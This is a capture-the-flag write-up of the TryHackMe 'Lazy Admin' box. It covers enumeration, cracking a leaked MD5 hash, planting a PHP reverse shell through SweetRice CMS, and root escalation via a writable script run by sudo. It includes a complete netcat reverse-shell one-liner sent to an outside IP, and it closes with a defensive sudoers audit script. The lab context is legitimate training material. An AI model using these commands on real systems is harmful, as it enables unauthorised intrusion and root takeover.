THM — Lazy Admin

gh0stsh3ll5619, published in System Weakness, Mar 9, 2023

I'm back with another quick, easy box from TryHackMe. This box is very straightforward. We enumerate what is presented to us, and that enumeration leads to a login page whose credentials can be found with a bit more digging. Once logged in we get a reverse shell; if we can't work out how on our own, one of the searchsploit results shows the path to a shell. From there we enumerate from inside the shell, which reveals a simple privilege escalation to root.

As always, we start our nmap scan.

nmap -sC -sV 10.10.115.218

We see that ports 80 and 22 are open. We don't have any creds for port 22, so let's move to port 80.

Once we're on the website we see that it's the Apache default page. Let's look at the source code, but there is nothing there.

Since there is nothing here, let's begin enumerating. We will use dirb, gobuster, dirbuster, and nikto.

dirb http://10.10.115.218

We see that dirb found the directory /content, so let's check it out.

We see that this is a CMS called SweetRice. Looking at the source code, there is nothing else present. Let's keep this CMS in mind and continue to enumerate, this time by running dirb and gobuster against /content.

gobuster dir -u 10.10.115.218/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We see that gobuster found some more directories, so let's make sure we look at each one.

/images has no valuable information, and neither does /js or /attachment.

Looking at /inc we find something interesting: a file called mysql_backup. Let's look at what's inside.

mysql_backup

We download the file so we can look at what's inside. For now, let's look at /as to make sure nothing else is present.

/as is the login page for SweetRice, so now we have found a way into the system. From here we're either going to have to brute-force the login page or find some creds.

/as directory

Let's navigate back to the mysql_backup file we found and open it to see if we can find anything.

Within the dump we can see some keywords: manager, admin, and what appears to be a hash labelled passwd.

Let's run that hash through hashid to see what type it is.

hashid 42f749ade7f9e195bf475f37a44cafcb

We see that this is either MD2 or MD5. We can crack this hash with CyberChef, hashcat, or CrackStation. Let's just use CrackStation to do it quickly.

We find that the passwd is Password123. Let's use this password with manager or admin to see if we can log in to the SweetRice login page at /as.

We see that these creds worked, and the pair was manager:Password123.

Now we're in SweetRice, running version 1.5.1. We know we need a reverse shell to gain access. Let's run searchsploit against it to see if we can find anything.

Let's look at the File Upload and the Cross-Site Request Forgery / PHP Code entries.

We see that the file upload exploit will allow us to upload a file. The PHP code exploit describes how SweetRice can be abused: code written into the Ads tab is stored as a file on the server. We can use a PHP reverse shell to try to gain access.

I used pentestmonkey's PHP reverse shell and added it to the Ads section.

PHP Reverse Shell

We see that to trigger the shell we have to navigate to /content/inc/ads, where we do see the file. Let's start our nc listener and click on the file to trigger the exploit.

We see that we have a shell on our nc listener.

nc -lvp 5619

Now we can navigate the filesystem, where we find the user.txt file at /home/itguy.

Let's also upgrade our shell: python -c 'import pty;pty.spawn("/bin/bash")'

Now to perform privilege escalation. We start with our usual check, sudo -l, which shows whether any commands can be run with sudo without a password.

NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Another route would be to host a Python web server with linpeas and wget it from our shell. We didn't have to, because sudo -l already showed what commands we can run.

Let's look at backup.pl. We see that this script calls /etc/copy.sh. Let's now look at /etc/copy.sh to see what we can do with it.

We see that this is a reverse shell. Well, this makes it easy! Let's change the IP address and port number to ours to catch the shell with netcat. It turns out it's not that easy: vim, nano and gedit do not work.

This means we have to use echo or touch to change the data in the file. Let's use echo, by running the following command.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.9.69 4444 >/tmp/f" > /etc/copy.sh

This overwrites the file's contents; we can confirm it worked by cat-ing the file again. Let's start another nc listener on the port we chose. Make sure it's not a common port and not one already in use.

Now, to execute the file, we follow exactly what sudo -l stated.

sudo /usr/bin/perl /home/itguy/backup.pl

We see this works properly because it did not prompt us for a password. Let's go back to our nc listener and see if it worked.

We see that it worked. We can now run id, or whoami to confirm that we are root.
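The escalation above works because a NOPASSWD sudo rule runs a script (backup.pl) that in turn executes a file (/etc/copy.sh) an unprivileged user can modify. As an added example, not part of the original writeup, the following Python audits sudoers rules for exactly that pattern; the sudoers text, file owners, modes and script bodies are constructed stand-ins (only the paths come from the box), and `FILES` is a hypothetical in-memory model of the filesystem.

```python
import re
import stat

# Constructed sample data standing in for the box: only the paths come from the
# writeup; the sudoers text, owners, modes and script bodies are assumptions.
SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
itguy ALL=(root) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
"""

# path -> (owner, mode, content): a tiny model of the filesystem
FILES = {
    "/usr/bin/perl": ("root", 0o755, ""),
    "/home/itguy/backup.pl": ("root", 0o644, 'system("sh", "/etc/copy.sh");\n'),
    "/etc/copy.sh": ("root", 0o666, "#!/bin/sh\n# reverse shell body omitted\n"),
}

NOPASSWD_RE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?NOPASSWD:\s*(.+)$")
PATH_RE = re.compile(r"/[\w./-]+")


def writable_by_others(mode):
    """True if the group or world write bit is set."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_nopasswd(sudoers, files):
    """Return (user, command, offending_path) for every NOPASSWD rule whose
    command, or any script reachable from it, is not root-owned or is
    writable by others. Paths absent from `files` are ignored."""
    findings = []
    for line in sudoers.splitlines():
        m = NOPASSWD_RE.match(line.strip())
        if not m:
            continue
        user, cmd = m.group(1), m.group(2)
        seen, queue = set(), PATH_RE.findall(cmd)
        while queue:
            path = queue.pop()
            if path in seen or path not in files:
                continue
            seen.add(path)
            owner, mode, content = files[path]
            if owner != "root" or writable_by_others(mode):
                findings.append((user, cmd, path))
            # Follow scripts the script itself invokes (backup.pl -> copy.sh)
            queue.extend(PATH_RE.findall(content))
    return findings
```

Running `audit_nopasswd(SUDOERS, FILES)` flags /etc/copy.sh for the itguy rule; on a real host the same check would read /etc/sudoers and stat the files instead of the constructed model.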

Now cd to /root to get the root.txt file.

Congrats, you have now exploited this box, all thanks to a lazy admin configuration. Hopefully you were able to learn the importance of ENUMERATION! It will always be key to finding some type of information. We also learned how to chain multiple shells to gain root access, with some command line tricks to manipulate files to our needs.


Penetration Tester for 8 years. For tactical testing, follow aressec.net. Follow me as I complete boxes to better sharpen my skills and provide tips on pentesting.